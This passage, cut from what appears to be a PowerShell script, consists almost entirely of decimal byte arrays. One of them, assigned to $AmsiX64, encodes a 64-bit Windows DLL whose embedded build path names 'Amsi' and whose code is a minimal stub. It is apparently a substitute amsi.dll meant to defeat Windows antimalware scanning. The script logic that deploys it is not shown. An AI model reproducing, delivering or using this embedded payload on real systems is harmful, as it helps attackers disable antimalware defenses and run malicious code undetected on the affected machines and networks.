0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + $AmsiX64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 148 172 98 253 208 205 12 174 208 205 12 174 208 205 12 174 217 181 159 174 210 205 12 174 190 150 13 175 211 205 12 174 190 150 15 175 210 205 12 174 190 150 9 175 216 205 12 174 190 150 8 175 217 205 12 174 13 50 199 174 210 205 12 174 208 205 13 174 240 205 12 174 2 150 4 175 209 205 12 174 2 150 243 174 209 205 12 174 2 150 14 175 209 205 12 174 82 105 99 104 208 205 12 174 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 7 0 136 29 62 87 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 16 0 0 0 28 0 0 0 0 0 0 160 19 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 128 0 0 0 4 0 0 0 0 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 108 38 0 0 80 0 0 0 0 96 0 0 224 1 0 0 0 64 0 0 176 1 0 0 0 0 0 0 0 0 0 0 0 112 0 0 24 0 0 0 112 33 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 33 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 248 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 211 14 0 0 0 16 0 0 0 16 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 128 10 0 0 0 32 0 0 0 12 0 0 0 20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 64 6 0 0 0 48 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 112 100 97 116 97 0 0 176 1 0 0 0 64 0 0 0 2 0 0 0 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 103 102 105 100 115 0 0 16 0 0 0 0 80 0 0 0 2 0 0 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 96 0 0 0 2 0 0 0 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 24 0 0 0 0 112 0 0 0 2 0 0 0 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 195 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 72 59 13 217 31 0 0 242 117 18 72 193 193 16 102 247 193 255 255 242 117 2 242 195 72 193 201 16 233 211 3 0 0 204 204 204 72 131 236 40 133 210 116 57 131 234 1 116 40 131 234 1 116 22 131 250 1 116 10 184 1 0 0 0 72 131 196 40 195 232 142 5 0 0 235 5 232 95 5 0 0 15 182 192 72 131 196 40 195 73 139 208 72 131 196 40 233 15 0 0 0 77 133 192 15 149 193 72 131 196 40 233 44 1 0 0 72 137 92 36 8 72 137 116 36 16 72 137 124 36 32 65 86 72 131 236 32 72 139 242 76 139 241 51 201 232 2 6 0 0 132 192 117 7 51 192 233 232 0 0 0 232 150 4 0 0 138 216 136 68 36 64 64 183 1 131 61 234 36 0 0 0 116 10 185 7 0 0 0 232 62 9 0 0 199 5 212 36 0 0 1 0 0 0 232 199 4 0 0 132 192 116 103 232 110 10 0 0 72 141 13 179 10 0 0 232 6 8 0 0 232 197 8 0 0 72 141 13 206 8 0 0 232 245 7 0 0 232 224 8 0 0 72 141 21 253 15 0 0 72 141 13 238 15 0 0 232 213 12 0 0 133 192 117 41 232 96 4 0 0 132 192 116 32 72 141 21 205 15 0 0 72 141 13 190 15 0 0 232 175 12 0 0 199 5 103 36 0 0 2 0 0 0 64 50 255 138 203 232 9 7 0 0 64 132 255 15 133 78 255 255 255 232 167 8 0 0 72 139 216 72 131 56 0 116 36 72 139 200 232 78 6 0 0 132 192 116 24 72 139 27 72 139 203 232 111 10 0 0 76 139 198 186 2 0 0 0 73 139 206 255 211 255 5 156 30 0 0 184 1 0 0 0 72 139 92 36 48 72 139 116 36 56 72 139 124 36 72 72 131 196 32 65 94 195 204 72 137 92 36 8 72 137 116 36 24 87 72 131 236 32 64 138 241 139 5 104 30 0 0 51 219 133 192 127 4 51 192 235 80 255 200 137 5 86 30 0 0 232 109 3 0 0 64 138 248 136 68 36 56 131 61 195 35 0 0 2 116 10 185 7 0 0 0 232 23 8 0 0 232 102 4 0 0 137 29 172 35 0 0 232 139 4 0 0 64 138 207 232 75 6 0 0 51 210 64 138 206 232 101 6 0 0 132 192 15 149 195 139 195 72 139 92 36 48 72 139 116 36 64 72 131 196 32 95 195 204 204 72 139 196 72 137 88 32 76 137 64 24 137 80 16 72 137 72 8 86 87 65 86 72 131 236 64 77 139 240 139 250 72 139 241 141 66 255 131 248 1 119 46 232 217 0 0 0 139 216 137 68 36 48 133 192 15 132 179 0 0 0 77 139 198 139 215 72 139 206 232 182 253 255 255 139 216 137 68 36 48 133 192 15 132 152 0 0 0 131 255 1 117 8 72 139 206 232 55 11 0 0 77 139 198 139 215 72 139 206 232 74 253 255 255 139 216 137 68 36 48 131 255 1 117 52 133 192 117 39 77 139 198 51 210 72 139 206 232 46 253 255 255 77 139 198 51 210 72 139 206 232 101 253 255 255 77 139 198 51 210 72 139 206 232 96 0 0 0 131 255 1 117 4 133 219 116 4 133 255 117 12 72 139 206 232 229 10 0 0 133 255 116 5 131 255 3 117 42 77 139 198 139 215 72 139 206 232 45 253 255 255 139 216 137 68 36 48 133 192 116 19 77 139 198 139 215 72 139 206 232 30 0 0 0 139 216 137 68 36 48 235 6 51 219 137 92 36 48 139 195 72 139 92 36 120 72 131 196 64 65 94 95 94 195 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 72 139 29 233 13 0 0 73 139 248 139 242 72 139 233 72 133 219 117 5 141 67 1 235 18 72 139 203 232 127 8 0 0 76 139 199 139 214 72 139 205 255 211 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 195 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 73 139 248 139 218 72 139 241 131 250 1 117 5 232 99 5 0 0 76 139 199 139 211 72 139 206 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 233 103 254 255 255 204 204 204 64 83 72 131 236 32 72 139 217 51 201 255 21 119 12 0 0 72 139 203 255 21 6 12 0 0 255 21 32 12 0 0 72 139 200 186 9 4 0 192 72 131 196 32 91 72 255 37 76 12 0 0 72 137 76 36 8 72 131 236 56 185 23 0 0 0 232 13 10 0 0 133 192 116 7 185 2 0 0 0 205 41 72 141 13 183 28 0 0 232 170 0 0 0 72 139 68 36 56 72 137 5 158 29 0 0 72 141 68 36 56 72 131 192 8 72 137 5 46 29 0 0 72 139 5 135 29 0 0 72 137 5 248 27 0 0 72 139 68 36 64 72 137 5 252 28 0 0 199 5 210 27 0 0 9 4 0 192 199 5 204 27 0 0 1 0 0 0 199 5 214 27 0 0 1 0 0 0 184 8 0 0 0 72 107 192 0 72 141 13 206 27 0 0 72 199 4 1 2 0 0 0 184 8 0 0 0 72 107 192 0 72 139 13 70 27 0 0 72 137 76 4 32 184 8 0 0 0 72 107 192 1 72 139 13 57 27 0 0 72 137 76 4 32 72 141 13 125 12 0 0 232 0 255 255 255 72 131 196 56 195 204 204 204 64 83 86 87 72 131 236 64 72 139 217 255 21 31 11 0 0 72 139 179 248 0 0 0 51 255 69 51 192 72 141 84 36 96 72 139 206 255 21 253 10 0 0 72 133 192 116 57 72 131 100 36 56 0 72 141 76 36 104 72 139 84 36 96 76 139 200 72 137 76 36 48 76 139 198 72 141 76 36 112 72 137 76 36 40 51 201 72 137 92 36 32 255 21 190 10 0 0 255 199 131 255 2 124 177 72 131 196 64 95 94 91 195 204 204 204 72 131 236 40 232 103 8 0 0 133 192 116 33 101 72 139 4 37 48 0 0 0 72 139 72 8 235 5 72 59 200 116 20 51 192 240 72 15 177 13 64 32 0 0 117 238 50 192 72 131 196 40 195 176 1 235 247 204 204 204 72 131 236 40 232 43 8 0 0 133 192 116 7 232 94 6 0 0 235 5 232 95 8 0 0 176 1 72 131 196 40 195 72 131 236 40 51 201 232 65 1 0 0 132 192 15 149 192 72 131 196 40 195 204 204 204 72 131 236 40 232 99 8 0 0 132 192 117 4 50 192 235 18 232 86 8 0 0 132 192 117 7 232 77 8 0 0 235 236 176 1 72 131 196 40 195 72 131 236 40 232 59 8 0 0 232 54 8 0 0 176 1 72 131 196 40 195 204 204 204 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 73 139 249 73 139 240 139 218 72 139 233 232 152 7 0 0 133 192 117 23 131 251 1 117 18 72 139 207 232 187 5 0 0 76 139 198 51 210 72 139 205 255 215 72 139 84 36 88 139 76 36 80 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 233 153 7 0 0 204 204 204 72 131 236 40 232 79 7 0 0 133 192 116 16 72 141 13 72 31 0 0 72 131 196 40 233 145 7 0 0 232 106 249 255 255 133 192 117 5 232 143 7 0 0 72 131 196 40 195 72 131 236 40 51 201 232 141 7 0 0 72 131 196 40 233 132 7 0 0 64 83 72 131 236 32 15 182 5 59 31 0 0 133 201 187 1 0 0 0 15 68 195 136 5 43 31 0 0 232 46 5 0 0 232 93 7 0 0 132 192 117 4 50 192 235 20 232 80 7 0 0 132 192 117 9 51 201 232 69 7 0 0 235 234 138 195 72 131 196 32 91 195 204 204 204 72 137 92 36 8 85 72 139 236 72 131 236 64 139 217 131 249 1 15 135 166 0 0 0 232 171 6 0 0 133 192 116 43 133 219 117 39 72 141 13 160 30 0 0 232 225 6 0 0 133 192 116 4 50 192 235 122 72 141 13 164 30 0 0 232 205 6 0 0 133 192 15 148 192 235 103 72 139 21 169 24 0 0 73 131 200 255 139 194 185 64 0 0 0 131 224 63 43 200 176 1 73 211 200 76 51 194 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 16 77 240 15 17 5 69 30 0 0 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 17 13 61 30 0 0 242 15 16 77 240 15 17 5 57 30 0 0 242 15 17 13 65 30 0 0 72 139 92 36 80 72 131 196 64 93 195 185 5 0 0 0 232 84 2 0 0 204 204 204 204 72 131 236 24 76 139 193 184 77 90 0 0 102 57 5 29 232 255 255 117 124 72 99 5 80 232 255 255 72 141 21 13 232 255 255 72 141 12 16 129 57 80 69 0 0 117 98 184 11 2 0 0 102 57 65 24 117 87 76 43 194 15 183 65 20 72 141 81 24 72 3 208 15 183 65 6 72 141 12 128 76 141 12 202 72 137 20 36 73 59 209 116 24 139 74 12 76 59 193 114 10 139 66 8 3 193 76 59 192 114 8 72 131 194 40 235 223 51 210 72 133 210 117 4 50 192 235 23 247 66 36 0 0 0 128 116 4 50 192 235 10 176 1 235 6 50 192 235 2 50 192 72 131 196 24 195 64 83 72 131 236 32 138 217 232 83 5 0 0 51 210 133 192 116 11 132 219 117 7 72 135 21 62 29 0 0 72 131 196 32 91 195 64 83 72 131 236 32 128 61 99 29 0 0 0 138 217 116 4 132 210 117 14 138 203 232 144 5 0 0 138 203 232 137 5 0 0 176 1 72 131 196 32 91 195 204 64 83 72 131 236 32 72 139 21 55 23 0 0 72 139 217 139 202 72 51 21 251 28 0 0 131 225 63 72 211 202 72 131 250 255 117 10 72 139 203 232 63 5 0 0 235 15 72 139 211 72 141 13 219 28 0 0 232 34 5 0 0 51 201 133 192 72 15 68 203 72 139 193 72 131 196 32 91 195 204 72 131 236 40 232 167 255 255 255 72 247 216 27 192 247 216 255 200 72 131 196 40 195 204 72 137 92 36 32 85 72 139 236 72 131 236 32 72 131 101 24 0 72 187 50 162 223 45 153 43 0 0 72 139 5 185 22 0 0 72 59 195 117 111 72 141 77 24 255 21 226 6 0 0 72 139 69 24 72 137 69 16 255 21 220 6 0 0 139 192 72 49 69 16 255 21 216 6 0 0 139 192 72 141 77 32 72 49 69 16 255 21 208 6 0 0 139 69 32 72 141 77 16 72 193 224 32 72 51 69 32 72 51 69 16 72 51 193 72 185 255 255 255 255 255 255 0 0 72 35 193 72 185 51 162 223 45 153 43 0 0 72 59 195 72 15 68 193 72 137 5 69 22 0 0 72 139 92 36 72 72 247 208 72 137 5 62 22 0 0 72 131 196 32 93 195 72 141 13 57 28 0 0 72 255 37 82 6 0 0 204 204 72 141 13 41 28 0 0 233 6 4 0 0 72 141 5 45 28 0 0 195 72 141 5 45 28 0 0 195 72 131 236 40 232 231 255 255 255 72 131 8 4 232 230 255 255 255 72 131 8 2 72 131 196 40 195 204 72 141 5 25 28 0 0 195 72 137 92 36 8 85 72 141 172 36 64 251 255 255 72 129 236 192 5 0 0 139 217 185 23 0 0 0 232 243 3 0 0 133 192 116 4 139 203 205 41 131 37 224 27 0 0 0 72 141 77 240 51 210 65 184 208 4 0 0 232 151 3 0 0 72 141 77 240 255 21 173 5 0 0 72 139 157 232 0 0 0 72 141 149 216 4 0 0 72 139 203 69 51 192 255 21 139 5 0 0 72 133 192 116 60 72 131 100 36 56 0 72 141 141 224 4 0 0 72 139 149 216 4 0 0 76 139 200 72 137 76 36 48 76 139 195 72 141 141 232 4 0 0 72 137 76 36 40 72 141 77 240 72 137 76 36 32 51 201 255 21 66 5 0 0 72 139 133 200 4 0 0 72 141 76 36 80 72 137 133 232 0 0 0 51 210 72 141 133 200 4 0 0 65 184 152 0 0 0 72 131 192 8 72 137 133 136 0 0 0 232 0 3 0 0 72 139 133 200 4 0 0 72 137 68 36 96 199 68 36 80 21 0 0 64 199 68 36 84 1 0 0 0 255 21 14 5 0 0 131 248 1 72 141 68 36 80 72 137 68 36 64 72 141 69 240 15 148 195 72 137 68 36 72 51 201 255 21 45 5 0 0 72 141 76 36 64 255 21 186 4 0 0 133 192 117 10 246 219 27 192 33 5 220 26 0 0 72 139 156 36 208 5 0 0 72 129 196 192 5 0 0 93 195 204 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 72 141 29 154 9 0 0 72 141 53 147 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 105 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 72 141 29 94 9 0 0 72 141 53 87 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 29 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 255 37 241 4 0 0 204 72 137 92 36 16 85 72 139 236 72 131 236 32 131 101 232 0 51 201 51 192 199 5 245 19 0 0 2 0 0 0 15 162 68 139 193 199 5 226 19 0 0 1 0 0 0 65 129 240 110 116 101 108 68 139 202 65 129 241 105 110 101 73 68 139 210 69 11 200 139 211 129 242 71 101 110 117 68 139 216 68 11 202 184 1 0 0 0 65 15 148 192 129 241 99 65 77 68 129 243 65 117 116 104 65 129 242 101 110 116 105 65 11 218 11 217 65 15 148 194 51 201 15 162 68 139 201 137 69 240 69 132 192 68 137 77 248 68 139 5 156 25 0 0 139 200 137 93 244 137 85 252 116 82 72 131 13 118 19 0 0 255 65 131 200 4 37 240 63 255 15 68 137 5 122 25 0 0 61 192 6 1 0 116 40 61 96 6 2 0 116 33 61 112 6 2 0 116 26 5 176 249 252 255 131 248 32 119 27 72 187 1 0 1 0 1 0 0 0 72 15 163 195 115 11 65 131 200 1 68 137 5 64 25 0 0 69 132 210 116 25 129 225 0 15 240 15 129 249 0 15 96 0 124 11 65 131 200 4 68 137 5 34 25 0 0 184 7 0 0 0 137 85 224 68 137 77 228 68 59 216 124 36 51 201 15 162 137 69 240 137 93 244 137 77 248 137 85 252 137 93 232 15 186 227 9 115 11 65 131 200 2 68 137 5 237 24 0 0 65 15 186 225 20 115 110 199 5 192 18 0 0 2 0 0 0 199 5 186 18 0 0 6 0 0 0 65 15 186 225 27 115 83 65 15 186 225 28 115 76 51 201 15 1 208 72 193 226 32 72 11 208 72 137 85 16 72 139 69 16 36 6 60 6 117 50 139 5 140 18 0 0 131 200 8 199 5 123 18 0 0 3 0 0 0 246 69 232 32 137 5 117 18 0 0 116 19 131 200 32 199 5 98 18 0 0 5 0 0 0 137 5 96 18 0 0 51 192 72 139 92 36 56 72 131 196 32 93 195 204 204 204 51 192 57 5 92 18 0 0 15 149 192 195 194 0 0 204 204 204 204 204 255 37 178 2 0 0 255 37 164 2 0 0 255 37 150 2 0 0 255 37 136 2 0 0 255 37 122 2 0 0 255 37 228 2 0 0 255 37 214 2 0 0 255 37 200 2 0 0 255 37 186 2 0 0 255 37 172 2 0 0 255 37 158 2 0 0 255 37 144 2 0 0 255 37 130 2 0 0 255 37 116 2 0 0 255 37 30 2 0 0 204 204 176 1 195 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 255 224 64 85 72 131 236 32 72 139 234 138 77 64 72 131 196 32 93 233 4 250 255 255 204 64 85 72 131 236 32 72 139 234 232 45 248 255 255 138 77 56 72 131 196 32 93 233 232 249 255 255 204 64 85 72 131 236 48 72 139 234 72 139 1 139 16 72 137 76 36 40 137 84 36 32 76 141 13 161 241 255 255 76 139 69 112 139 85 104 72 139 77 96 232 93 247 255 255 144 72 131 196 48 93 195 204 64 85 72 139 234 72 139 1 51 201 129 56 5 0 0 192 15 148 193 139 193 93 195 204 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 216 29 0 128 1 0 0 0 80 30 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 48 0 128 1 0 0 0 240 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 136 29 62 87 0 0 0 0 2 0 0 0 65 0 0 0 116 34 0 0 116 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 184 34 0 0 184 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 13 0 0 0 68 2 0 0 204 34 0 0 204 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 32 0 128 1 0 0 0 0 33 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 82 83 68 83 42 80 223 113 29 247 64 69 188 37 18 40 145 144 25 190 50 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 120 54 52 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 18 0 0 0 18 0 0 0 1 0 0 0 17 0 0 0 71 67 84 76 0 16 0 0 63 14 0 0 46 116 101 120 116 36 109 110 0 0 0 0 64 30 0 0 18 0 0 0 46 116 101 120 116 36 109 110 36 48 48 0 82 30 0 0 129 0 0 0 46 116 101 120 116 36 120 0 0 32 0 0 248 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 248 32 0 0 16 0 0 0 46 48 48 99 102 103 0 0 8 33 0 0 8 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 16 33 0 0 8 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 24 33 0 0 8 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 32 33 0 0 8 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 40 33 0 0 8 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 48 33 0 0 8 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 56 33 0 0 8 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 64 33 0 0 8 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 80 33 0 0 36 1 0 0 46 114 100 97 116 97 0 0 116 34 0 0 156 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 16 37 0 0 8 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 24 37 0 0 8 0 0 0 46 114 116 99 36 73 90 90 0 0 0 0 32 37 0 0 8 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 40 37 0 0 8 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 48 37 0 0 60 1 0 0 46 120 100 97 116 97 0 0 108 38 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 168 38 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 192 38 0 0 248 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 184 39 0 0 200 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 52 0 0 0 46 100 97 116 97 0 0 0 64 48 0 0 0 6 0 0 46 98 115 115 0 0 0 0 0 64 0 0 176 1 0 0 46 112 100 97 116 97 0 0 0 80 0 0 16 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 96 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 96 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 17 21 8 0 21 116 9 0 21 100 7 0 21 52 6 0 21 50 17 224 236 29 0 0 1 0 0 0 207 16 0 0 92 17 0 0 82 30 0 0 0 0 0 0 17 15 6 0 15 100 8 0 15 52 6 0 15 50 11 112 236 29 0 0 1 0 0 0 246 17 0 0 20 18 0 0 105 30 0 0 0 0 0 0 1 6 2 0 6 50 2 80 1 20 8 0 20 100 8 0 20 84 7 0 20 52 6 0 20 50 16 112 9 26 6 0 26 52 15 0 26 114 22 224 20 112 19 96 236 29 0 0 1 0 0 0 102 18 0 0 54 19 0 0 133 30 0 0 54 19 0 0 1 6 2 0 6 82 2 80 1 9 1 0 9 98 0 0 1 8 4 0 8 114 4 112 3 96 2 48 9 4 1 0 4 34 0 0 236 29 0 0 1 0 0 0 215 23 0 0 101 24 0 0 187 30 0 0 101 24 0 0 1 2 1 0 2 80 0 0 1 4 1 0 4 66 0 0 1 6 2 0 6 50 2 48 1 13 4 0 13 52 10 0 13 114 6 80 1 13 4 0 13 52 9 0 13 50 6 80 1 21 5 0 21 52 186 0 21 1 184 0 6 80 0 0 1 15 6 0 15 100 7 0 15 52 6 0 15 50 11 112 1 13 4 0 13 52 7 0 13 50 6 80 0 0 0 0 1 0 0 0 56 39 0 0 0 0 0 0 0 0 0 0 62 40 0 0 120 32 0 0 104 39 0 0 0 0 0 0 0 0 0 0 6 41 0 0 168 32 0 0 192 38 0 0 0 0 0 0 0 0 0 0 114 42 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 8 0 95 95 67 95 115 112 101 99 105 102 105 99 95 104 97 110 100 108 101 114 0 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 62 0 109 101 109 115 101 116 0 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 54 0 95 105 110 105 116 116 101 114 109 0 55 0 95 105 110 105 116 116 101 114 109 95 101 0 63 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 51 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 52 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 0 60 0 95 